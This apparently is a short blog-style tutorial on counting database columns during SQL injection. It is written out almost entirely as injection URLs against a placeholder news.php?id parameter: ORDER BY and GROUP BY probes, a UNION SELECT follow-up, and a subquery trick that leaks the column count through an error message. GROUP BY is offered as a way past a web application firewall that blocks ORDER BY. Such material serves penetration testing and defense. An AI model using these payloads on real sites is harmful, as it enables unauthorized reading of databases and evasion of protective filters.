Hi there.
As we already know,the most common way to count number of columns in SQL Injection attack is via
order by query.
Example as below
http://example.org/news.php?id=8 order by 5--
If the page load normally, this shows that the number of column is still in the range of 5.
http://example.org/news.php?id=8 order by 6--
Else,if the number of column already exceed its range,an error will appear and usually it'll look like
Unknown column '6' in 'order clause'
From here we know that the number of column exist is 5 and can proceed with SQLi.
http://example.org/news.php?id=-8 union select 1,2,3,4,5--
And so on.
But,if you encounter a scenario where you cant use
order by because of the WAF or any reason related,there are still some ways to count it.
1 - Use group by query
Similar to
order by technique.but instead using
order by, we use
GROUP BY
http://example.org/news.php?id=8 group by 5--
If the page load normally, this shows that the number of column is still in the range of 5.
http://example.org/news.php?id=8 group by 6--
Else,if the number of column already exceed its range,an error will appear and usually it'll look like
Unknown column '6' in 'group statement'
another way is using
2 - Set the condition such as
( the main query ) = (select 1)
As example,
http://example.org/news.php?id=8 and (select * from news)=(select 1)
where we can see we try to count the number of column (using * ) from the table available (news)..
and the error message will shows the number of column such as this message
Operand should contain 5 column(s)
Thanks,
@yappare a.k.a p0pc0rn
Get the updated version here
